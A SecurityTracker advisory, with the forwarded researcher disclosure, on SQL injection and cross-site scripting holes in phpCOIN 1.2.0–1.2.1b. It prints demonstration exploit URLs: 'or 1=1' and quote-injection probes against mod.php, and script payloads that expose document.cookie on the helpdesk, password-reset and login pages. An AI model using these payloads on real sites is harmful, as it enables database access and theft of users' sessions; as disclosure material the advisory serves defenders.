SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   phpCOIN Vendors:   phpcoin.com
phpCOIN Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013329
SecurityTracker URL:  http://securitytracker.com/id/1013329
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 1 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 1.2.0, 1.2.1, 1.2.1b
Description:   Lostmon reported a vulnerability in phpCOIN. A remote user can inject SQL commands and conduct cross-site scripting attacks.

The 'mod.php' and 'login.php' scripts do not properly validate user-supplied input in several variables. Other scripts are also affected.

A remote user can supply specially crafted input to execute SQL commands on the underlying database. Some demonstration exploit URLs are provided:

http://[target]phpcoin/mod.php?mod=siteinfo&id=1'
http://[target]phpcoin/mod.php?mod=faq&mode=show&faq_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=pages&mode=view&id=25%20or%201=1
http://[target]phpcoin/mod.php?mod=siteinfo&id=4%20or%201=1

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the phpCOIN software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]phpcoin/mod.php?mod=helpdesk&mode=new
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/mod.php?mod=mail&mode=reset&w=user
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/login.php?w=user&o=login&e=u
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

A remote user can obtain information about the target system with the following type of URL:

http://[target]/phpcoin_directory/phpinfo.php

Lostmon reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the phpCOIN software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can obtain PHP configuration information.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpcoin.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Fwd: phpcoin posible sql injection comands and XSS


#############################################
phpcoin posible sql injection comands and XSS
vendor url:http://www.phpcoin.com/
vendor notified : yes exploit avaible:yes
advisore:http://lostmon.blogspot.com/2005/03/
phpcoin-posible-sql-injection-comands.html
#############################################

phpCOIN Is a free software package originally designed for web-hosting
resellers to handle clients, orders, invoices, notes and helpdesk, but
no longer limited to hosting resellers.

Some variables are not properly validate and permits sql injection comands
and cross-site scripting attacks.

############
sql injection:
############

dislose some sql data...

http://[target]phpcoin/mod.php?mod=siteinfo&id=1'

ummm them ...

http://[target]phpcoin/mod.php?mod=faq&mode=show&faq_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=pages&mode=view&id=25%20or%201=1
http://[target]phpcoin/mod.php?mod=siteinfo&id=4%20or%201=1

#################
cross site scripting
#################

http://[target]phpcoin/mod.php?mod=helpdesk&mode=new
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/mod.php?mod=mail&mode=reset&w=user
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/login.php?w=user&o=login&e=u
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

Other script are subceptibles to injection html or javascript code...

##################
versions afected :
##################

1.2.0
1.2.1b
1.2.1

##########
Solution :
##########
no solution was avaible at this time look for vendor information
or for new release versions.

atentamente:
Lostmon (lostmon@gmail.com)

Thnx to estrella to be my ligth
Thnx to all who belibed in me

Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....


-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

La curiosidad es lo que hace mover la mente....
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC